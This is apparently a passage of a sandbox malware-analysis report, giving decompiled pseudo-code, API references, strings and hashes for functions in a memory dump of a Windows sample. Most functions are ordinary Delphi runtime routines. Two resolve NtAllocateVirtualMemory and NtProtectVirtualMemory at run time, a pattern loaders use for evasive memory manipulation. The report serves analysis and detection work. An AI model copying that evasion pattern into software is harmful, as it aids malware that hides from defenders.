Instruction ID: c5affe84f4f6a65560b125021cd6d2f067269f6a30cf76b6d99536202a50c600
Opcode Fuzzy Hash: 2c879650c84341011691a20226c27d6524aee0beb2559d3f6bcac5042424fc10
Instruction Fuzzy Hash: AF51DB79A1062D9FCB22DB98CD90BD9B3BCAF4D204F0541D5E609EB211D670AFC58F61

Uniqueness

Uniqueness Score: -1.00%

Function 0326355C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
registryCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0326355C() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x3289024 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t14 =  *0x3289024 & 0xffc0 | _v12 & 0x3f;
					 *0x3289024 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E032635CD);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x32635d4);
					return RegCloseKey(_v8);
				}
			}

0x0326355d
0x0326355f
0x03263569
0x03263585
0x032635e7
0x032635ea
0x032635f3
0x03263587
0x03263589
0x0326358a
0x0326358f
0x03263592
0x03263595
0x032635b1
0x032635b8
0x032635bb
0x032635be
0x032635cc
0x032635cc

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0326357E
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,032635CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 032635B1
RegCloseKey.ADVAPI32(?,032635D4,00000000,?,00000004,00000000,032635CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 032635C7

Strings

FPUMaskValue, xrefs: 032635A8
SOFTWARE\Borland\Delphi\RTL, xrefs: 03263574

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 084f8adc9916032242907f0d18470e190abcff85399944a6c76ff94672bf51ae
Instruction ID: 6f74c4ca8e50337aa1c823b668c48763a21716a947d3e712562ed94af79dac46
Opcode Fuzzy Hash: 084f8adc9916032242907f0d18470e190abcff85399944a6c76ff94672bf51ae
Instruction Fuzzy Hash: 6001B579A60318BEDB12DBD09D42BBDB3ECDF08700F104165BB10DB580E674A6D0D758

Uniqueness

Uniqueness Score: -1.00%

Function 0326AA34 Relevance: 7.6, APIs: 5, Instructions: 50
threadCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0326AA34(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x326aacb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E0326A7A8(GetThreadLocale(), 0x326aae0, 0x100b,  &_v8);
				_t29 = E03267AEC(0x326aae0, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E0326A980, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x329d8f8;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E0326A9BC, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0326AAD2);
				return E032644A0( &_v8);
			}

0x0326aa34
0x0326aa37
0x0326aa3c
0x0326aa3d
0x0326aa42
0x0326aa45
0x0326aa5b
0x0326aa6d
0x0326aa77
0x0326aa87
0x0326aa8c
0x0326aa91
0x0326aa96
0x0326aa96
0x0326aa9c
0x0326aa9f
0x0326aa9f
0x0326aab0
0x0326aab0
0x0326aab7
0x0326aaba
0x0326aabd
0x0326aaca

APIs

GetThreadLocale.KERNEL32(?,00000000,0326AACB,?,?,00000000), ref: 0326AA4C

Part of subcall function 0326A7A8: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0326A7C6

GetThreadLocale.KERNEL32(00000000,00000004,00000000,0326AACB,?,?,00000000), ref: 0326AA7C
EnumCalendarInfoA.KERNEL32(Function_0000A980,00000000,00000000,00000004), ref: 0326AA87
GetThreadLocale.KERNEL32(00000000,00000003,00000000,0326AACB,?,?,00000000), ref: 0326AAA5
EnumCalendarInfoA.KERNEL32(Function_0000A9BC,00000000,00000000,00000003), ref: 0326AAB0

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 6b05729024cfa053ac32d3424cd081ba054abc71f10cfb7ff48a99150432493a
Instruction ID: 8c47bc5322d371f2907f8868689880fc5718e710d2287d740887252ae2546bae
Opcode Fuzzy Hash: 6b05729024cfa053ac32d3424cd081ba054abc71f10cfb7ff48a99150432493a
Instruction Fuzzy Hash: 8501F7B96213446FE301EA749D12B5F716CDF45620F510561E410BA6C0EAA49EC042E4

Uniqueness

Uniqueness Score: -1.00%

Function 0326AAE4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
threadCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0326AAE4(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t45;
				void* _t47;
				void* _t49;
				void* _t51;
				intOrPtr _t75;
				void* _t76;
				void* _t77;
				void* _t83;
				void* _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x326acb4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E032644A0(__edx);
				E0326A7A8(GetThreadLocale(), 0x326accc, 0x1009,  &_v12);
				if(E03267AEC(0x326accc, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						__eflags = _t92 - E03264760(_t124);
						if(__eflags > 0) {
							goto L28;
						}
						asm("bt [0x3289808], eax");
						if(__eflags >= 0) {
							_t45 = E032680A4(_t124 + _t92 - 1, 2, 0x326acd0);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E032680A4(_t124 + _t92 - 1, 4, 0x326ace0);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E032680A4(_t124 + _t92 - 1, 2, 0x326acf8);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 = ( *(_t124 + _t92 - 1) & 0x000000ff) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E0326476C(_t122, 0x326ad10);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E03264688();
												E0326476C(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E0326476C(_t122, 0x326ad04);
										_t92 = _t92 + 1;
									}
								} else {
									E0326476C(_t122, 0x326acf0);
									_t92 = _t92 + 3;
								}
							} else {
								E0326476C(_t122, 0x326acdc);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0326BAC8(_t124, _t92);
							E032649C4(_t124, _v8, _t92,  &_v20);
							E0326476C(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x329d8d0; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E032644F4(_t122, _t124);
					} else {
						while(_t92 <= E03264760(_t124)) {
							_t83 = ( *(_t124 + _t92 - 1) & 0x000000ff) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E03264688();
									E0326476C(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0326ACBB);
				return E032644C4( &_v24, 4);
			}

0x0326aae4
0x0326aae9
0x0326aaea
0x0326aaeb
0x0326aaec
0x0326aaed
0x0326aaf1
0x0326aaf3
0x0326aaf7
0x0326aaf8
0x0326aafd
0x0326ab00
0x0326ab03
0x0326ab0a
0x0326ab22
0x0326ab3a
0x0326ac8a
0x0326ac91
0x0326ac93
0x00000000
0x00000000
0x0326aba9
0x0326abb0
0x0326abee
0x0326abf3
0x0326abf5
0x0326ac17
0x0326ac1c
0x0326ac1e
0x0326ac3f
0x0326ac44
0x0326ac46
0x0326ac5c
0x0326ac5c
0x0326ac5e
0x0326ac64
0x0326ac6b
0x0326ac60
0x0326ac60
0x0326ac62
0x0326ac7a
0x0326ac84
0x00000000
0x00000000
0x00000000
0x0326ac62
0x0326ac48
0x0326ac4f
0x0326ac54
0x0326ac54
0x0326ac20
0x0326ac27
0x0326ac2c
0x0326ac2c
0x0326abf7
0x0326abfe
0x0326ac03
0x0326ac03
0x0326ac89
0x0326ac89
0x0326abb2
0x0326abbb
0x0326abc9
0x0326abd3
0x0326abd8
0x0326abd8
0x0326abb0
0x0326ab40
0x0326ab40
0x0326ab45
0x0326ab48
0x0326ab56
0x0326ab52
0x0326ab52
0x0326ab52
0x0326ab5a
0x0326ab97
0x0326ab5c
0x0326ab83
0x0326ab63
0x0326ab63
0x0326ab65
0x0326ab67
0x0326ab69
0x0326ab73
0x0326ab7d
0x0326ab7d
0x0326ab69
0x0326ab82
0x0326ab82
0x0326ab82
0x0326ab8e
0x0326ab5a
0x0326ac99
0x0326ac9b
0x0326ac9e
0x0326aca1
0x0326acb3

APIs

GetThreadLocale.KERNEL32(?,00000000,0326ACB4,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0326AB13

Part of subcall function 0326A7A8: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0326A7C6

Strings

eeee, xrefs: 0326AC22
yyyy, xrefs: 0326AC09
ggg, xrefs: 0326ABF9

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: ebc7ef4bb9dc09e699e41af8fdf0ecd269526f72ccd02b7d02538e4118eb30e9
Instruction ID: 2e42b41eb0b2eba4c1601090b1510b91b085942c7ac5a35673ca3c14da72418b
Opcode Fuzzy Hash: ebc7ef4bb9dc09e699e41af8fdf0ecd269526f72ccd02b7d02538e4118eb30e9
Instruction Fuzzy Hash: 6B4125B87342058FC712FBBE898027EF3DBEF86100B644466D481EB344DAB5DDC28661

Uniqueness

Uniqueness Score: -1.00%

Function 032779BC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E032779BC(intOrPtr _a4, char _a8, char _a12, intOrPtr _a16, intOrPtr _a20) {

				 *0x329e318 = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"), "NtAllocateVirtualMemory");
				 *0x329e318(_a4,  &_a8, 0,  &_a12, _a16, _a20);
				return _a8;
			}

0x032779d4
0x032779ef
0x032779f9

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 032779C9
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 032779CF

Strings

NtAllocateVirtualMemory, xrefs: 032779BF
C:\Windows\System32\ntdll.dll, xrefs: 032779C4

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
API String ID: 1646373207-2206134580
Opcode ID: 0b2c93b135c0715d558a49c65ba92ba1a84bd3cbcb4ef4967fe15d623d72c9eb
Instruction ID: 6c072f61195a41f98d289380d62a041ead18b41dcdac6ef065948beb22e9274c
Opcode Fuzzy Hash: 0b2c93b135c0715d558a49c65ba92ba1a84bd3cbcb4ef4967fe15d623d72c9eb
Instruction Fuzzy Hash: FCE0BFB665030DBFDB00EF98EC45EEF37ACAB0D610F408516BA14DB101D674E5908BB5

Uniqueness

Uniqueness Score: -1.00%

Function 03277A50 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E03277A50(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {

				 *0x329e31c = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"), "NtProtectVirtualMemory");
				 *0x329e31c(_a4, _a8, _a12, _a16, _a20);
				return 1;
			}

0x03277a68
0x03277a81
0x03277a8a

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 03277A5D
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 03277A63

Strings

NtProtectVirtualMemory, xrefs: 03277A53
C:\Windows\System32\ntdll.dll, xrefs: 03277A58

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
API String ID: 1646373207-1386159242
Opcode ID: b1ab73731cc6bd0f64524265252ad35f40e720adf86be432b8f98a61bcdd1c11
Instruction ID: 083e02497de710916d614da332befbe2e2e7de9b1473c601aafa837fe6974888
Opcode Fuzzy Hash: b1ab73731cc6bd0f64524265252ad35f40e720adf86be432b8f98a61bcdd1c11
Instruction Fuzzy Hash: 9AE0E6B56103097FC740EFACF885D9F37DCAB0C640B008015B918D7201C675E5918F75

Uniqueness

Uniqueness Score: -1.00%

Function 0326C458 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0326C458() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x328982c = _t1;
				}
				if( *0x328982c == 0) {
					 *0x328982c = E03267FB8;
					return E03267FB8;
				}
				return _t1;
			}

0x0326c45e
0x0326c463
0x0326c467
0x0326c46f
0x0326c474
0x0326c474
0x0326c480
0x0326c487
0x00000000
0x0326c487
0x0326c48d

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0328810B,00000000,0328811E), ref: 0326C45E
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0326C46F

Strings

GetDiskFreeSpaceExA, xrefs: 0326C469
kernel32.dll, xrefs: 0326C459

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 908fe0b0d887db900d4ba9d6ad278e42ac8d31cac10b3aa2eb2192bdff6c7d68
Instruction ID: ac7c145729af43a3488b39baeda055bc4d8769eb8d33a3b935e205f347b55d24
Opcode Fuzzy Hash: 908fe0b0d887db900d4ba9d6ad278e42ac8d31cac10b3aa2eb2192bdff6c7d68
Instruction Fuzzy Hash: 34D0C7746223675FDB10FBF57C85A3921D89F09718F44C4A5E1529A105D7B58CC04FE4

Uniqueness

Uniqueness Score: -1.00%

Function 03269AD0 Relevance: 6.4, Strings: 5, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E03269AD0(void* __ecx, void* __edx, signed char** __edi) {
				signed int _t147;
				signed int _t149;
				signed int _t151;
				signed int _t153;
				void* _t171;
				intOrPtr _t212;
				intOrPtr _t215;
				signed char _t220;
				intOrPtr _t258;
				signed char** _t261;
				signed int _t263;
				void* _t264;
				void* _t265;

				L0:
				while(1) {
					L0:
					_t261 = __edi;
					E03269314(_t264);
					_t263 =  *__edi - 1;
					_t265 = E032680A4(_t263, 5, 0x3269d7c);
					if(_t265 != 0) {
						_t147 = E032680A4(_t263, 3, 0x3269d84);
						__eflags = _t147;
						if(_t147 != 0) {
							_t149 = E032680A4(_t263, 4, 0x3269d88);
							__eflags = _t149;
							if(_t149 != 0) {
								_t151 = E032680A4(_t263, 4, 0x3269d90);
								__eflags = _t151;
								if(_t151 != 0) {
									_t153 = E032680A4(_t263, 3, 0x3269d98);
									__eflags = _t153;
									if(_t153 != 0) {
										E03269204(1,  *((intOrPtr*)(_t264 + 8)));
									} else {
										E032692DC(_t264);
										E03269248( *((intOrPtr*)(0x329d890 + (E032691C8(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t264 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t264 + 8)) + 0xc))) & 0x0000ffff) * 4)),  *((intOrPtr*)(_t264 + 8)));
										 *__edi =  &(( *__edi)[2]);
									}
								} else {
									E032692DC(_t264);
									E03269248( *((intOrPtr*)(0x329d8ac + (E032691C8(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t264 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t264 + 8)) + 0xc))) & 0x0000ffff) * 4)),  *((intOrPtr*)(_t264 + 8)));
									 *__edi =  &(( *__edi)[3]);
								}
							} else {
								__eflags =  *((short*)(_t264 - 0x16)) - 0xc;
								if( *((short*)(_t264 - 0x16)) >= 0xc) {
									_t212 =  *0x329d828; // 0x92f1b68
									E03269248(_t212,  *((intOrPtr*)(_t264 + 8)));
								} else {
									_t215 =  *0x329d824; // 0x92f1b58
									E03269248(_t215,  *((intOrPtr*)(_t264 + 8)));
								}
								 *_t261 =  &(( *_t261)[3]);
								 *((char*)(_t264 - 0x1f)) = 1;
							}
						} else {
							__eflags =  *((short*)(_t264 - 0x16)) - 0xc;
							if( *((short*)(_t264 - 0x16)) >= 0xc) {
								__eflags = _t263;
							}
							E03269204(1,  *((intOrPtr*)(_t264 + 8)));
							 *_t261 =  &(( *_t261)[2]);
							 *((char*)(_t264 - 0x1f)) = 1;
						}
					} else {
						__eflags =  *(__ebp - 0x16) - 0xc;
						if( *(__ebp - 0x16) >= 0xc) {
							__esi = __esi + 3;
							__eflags = __esi;
						}
						__eax =  *(__ebp + 8);
						__edx = 2;
						__eax = __esi;
						__eax = E03269204(2,  *(__ebp + 8));
						 *__edi =  *__edi + 4;
						 *((char*)(__ebp - 0x1f)) = 1;
					}
					L109:
					while( *( *_t261) != 0) {
						 *(_t264 - 5) =  *( *_t261) & 0x000000ff;
						asm("bt [0x3289808], eax");
						if(_t265 >= 0) {
							 *_t261 = E0326BAC0( *_t261);
							_t220 =  *(_t264 - 5) & 0x000000ff;
							__eflags = _t220 + 0x9f - 0x1a;
							if(_t220 + 0x9f - 0x1a < 0) {
								_t220 = _t220 - 0x20;
								__eflags = _t220;
							}
							L5:
							__eflags = _t220 + 0xbf - 0x1a;
							if(_t220 + 0xbf - 0x1a >= 0) {
								L10:
								_t171 = (_t220 & 0x000000ff) + 0xffffffde;
								__eflags = _t171 - 0x38;
								if(_t171 > 0x38) {
									L108:
									E03269204(1,  *((intOrPtr*)(_t264 + 8)));
									continue;
								}
								L11:
								switch( *((intOrPtr*)(( *(_t171 + 0x32696d0) & 0x000000ff) * 4 +  &M03269709))) {
									case 0:
										goto L108;
									case 1:
										L12:
										E032692B0(_t264);
										E032692DC(_t264);
										__eflags =  *((intOrPtr*)(_t264 - 0xc)) - 2;
										if( *((intOrPtr*)(_t264 - 0xc)) > 2) {
											E03269264( *(_t264 - 0xe) & 0x0000ffff, 4, _t269,  *((intOrPtr*)(_t264 + 8)));
										} else {
											E03269264(( *(_t264 - 0xe) & 0x0000ffff) % 0x64, 2, _t269,  *((intOrPtr*)(_t264 + 8)));
										}
										goto L109;
									case 2:
										L15:
										E032692B0(__ebp) = E032692DC(__ebp);
										__eax =  *(__ebp + 8);
										__edx = __ebp - 0x28;
										 *(__ebp - 0xc) = E03269354( *(__ebp - 0xc), __ebx, __ebp - 0x28, __esi, __ebp);
										__eax =  *(__ebp - 0x28);
										__eax = E03269248( *(__ebp - 0x28),  *(__ebp + 8));
										goto L109;
									case 3:
										L16:
										E032692B0(__ebp) = E032692DC(__ebp);
										__eax =  *(__ebp + 8);
										__edx = __ebp - 0x2c;
										 *(__ebp - 0xc) = E032694D0( *(__ebp - 0xc), __ebx, __ebp - 0x2c, __esi, __ebp);
										__eax =  *(__ebp - 0x2c);
										__eax = E03269248( *(__ebp - 0x2c),  *(__ebp + 8));
										goto L109;
									case 4:
										L17:
										E032692B0(__ebp) = E032692DC(__ebp);
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - 1;
										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
										__eflags =  *(__ebp - 0xc) - 0xffffffffffffffff;
										if(__eflags < 0) {
											__eax =  *(__ebp + 8);
											__eax =  *(__ebp - 0x10) & 0x0000ffff;
											__edx =  *(__ebp - 0xc);
											__eax = E03269264( *(__ebp - 0x10) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										} else {
											if(__eflags == 0) {
												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
												__eax = 0x329d830[ *(__ebp - 0x10) & 0x0000ffff];
												__eax = E03269248(0x329d830[ *(__ebp - 0x10) & 0x0000ffff],  *(__ebp + 8));
											} else {
												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
												__eax =  *(0x329d860 + ( *(__ebp - 0x10) & 0x0000ffff) * 4);
												__eax = E03269248( *(0x329d860 + ( *(__ebp - 0x10) & 0x0000ffff) * 4),  *(__ebp + 8));
											}
										}
										goto L109;
									case 5:
										L23:
										E032692B0(__ebp) =  *(__ebp - 0xc);
										__eax =  *(__ebp - 0xc) - 1;
										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
										__eflags = __eax;
										if(__eflags < 0) {
											E032692DC(__ebp) =  *(__ebp + 8);
											__eax =  *(__ebp - 0x12) & 0x0000ffff;
											__edx =  *(__ebp - 0xc);
											__eax = E03269264( *(__ebp - 0x12) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										} else {
											if(__eflags == 0) {
												E032691C8(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
												__eax =  *(0x329d890 + (__ax & 0x0000ffff) * 4);
												__eax = E03269248( *(0x329d890 + (__ax & 0x0000ffff) * 4),  *(__ebp + 8));
											} else {
												__eax = __eax - 1;
												__eflags = __eax;
												if(__eflags == 0) {
													E032691C8(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
													__eax =  *(0x329d8ac + (__ax & 0x0000ffff) * 4);
													__eax = E03269248( *(0x329d8ac + (__ax & 0x0000ffff) * 4),  *(__ebp + 8));
												} else {
													__eax = __eax - 1;
													__eflags = __eax;
													if(__eax == 0) {
														__eax =  *(__ebp + 8);
														__eax =  *0x329d818; // 0x92f8ed8
														__eax = E032695E8(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
													} else {
														__eax =  *(__ebp + 8);
														__eax =  *0x329d81c; // 0x92ea698
														__eax = E032695E8(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
													}
												}
											}
										}
										goto L109;
									case 6:
										L33:
										E032692B0(__ebp) = E03269314(__ebp);
										 *(__ebp - 0x20) = 0;
										__esi =  *__edi;
										while(1) {
											L52:
											__eflags =  *__esi;
											if(__eflags == 0) {
												break;
											}
											L34:
											 *__esi & 0x000000ff = __al & 0x000000ff;
											asm("bt [0x3289808], eax");
											if(__eflags >= 0) {
												L36:
												__eax =  *__esi & 0x000000ff;
												__eflags = __eax - 0x48;
												if(__eflags > 0) {
													L42:
													__eax = __eax - 0x61;
													__eflags = __eax;
													if(__eax == 0) {
														L45:
														__eflags =  *(__ebp - 0x20);
														if( *(__ebp - 0x20) != 0) {
															L51:
															__esi = __esi + 1;
															__eflags = __esi;
															continue;
														}
														L46:
														__edx = 0x3269d7c;
														__ecx = 5;
														__eax = __esi;
														__eax = E032680A4(__esi, 5, 0x3269d7c);
														__eflags = __eax;
														if(__eax == 0) {
															L49:
															 *((char*)(__ebp - 0x1f)) = 1;
															break;
														}
														L47:
														__edx = 0x3269d84;
														__ecx = 3;
														__eax = __esi;
														__eax = E032680A4(__esi, 3, 0x3269d84);
														__eflags = __eax;
														if(__eax == 0) {
															goto L49;
														}
														L48:
														__edx = 0x3269d88;
														__ecx = 4;
														__eax = __esi;
														__eax = E032680A4(__esi, 4, 0x3269d88);
														__eflags = __eax;
														if(__eax != 0) {
															break;
														}
														goto L49;
													}
													L43:
													__eax = __eax - 7;
													__eflags = __eax;
													if(__eax == 0) {
														break;
													}
													L44:
													goto L51;
												}
												L37:
												if(__eflags == 0) {
													break;
												}
												L38:
												__eax = __eax - 0x22;
												__eflags = __eax;
												if(__eax == 0) {
													L50:
													__eax =  *(__ebp - 0x20) & 0x000000ff;
													__al = __al ^ 0x00000001;
													__eflags = __al;
													 *(__ebp - 0x20) = __al;
													goto L51;
												}
												L39:
												__eax = __eax - 5;
												__eflags = __eax;
												if(__eax == 0) {
													goto L50;
												}
												L40:
												__eax = __eax - 0x1a;
												__eflags = __eax;
												if(__eax == 0) {
													goto L45;
												}
												L41:
												goto L51;
											} else {
												__eax = __esi;
												__esi = E0326BAC0(__esi);
												continue;
											}
										}
										L53:
										__eax =  *(__ebp - 0x16) & 0x0000ffff;
										 *(__ebp - 0x22) = __ax;
										__eflags =  *((char*)(__ebp - 0x1f));
										if( *((char*)(__ebp - 0x1f)) != 0) {
											__eflags =  *(__ebp - 0x22);
											if( *(__ebp - 0x22) != 0) {
												__eflags =  *(__ebp - 0x22) - 0xc;
												if( *(__ebp - 0x22) > 0xc) {
													_t69 = __ebp - 0x22;
													 *_t69 =  *(__ebp - 0x22) - 0xc;
													__eflags =  *_t69;
												}
											} else {
												 *(__ebp - 0x22) = 0xc;
											}
										}
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x22) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
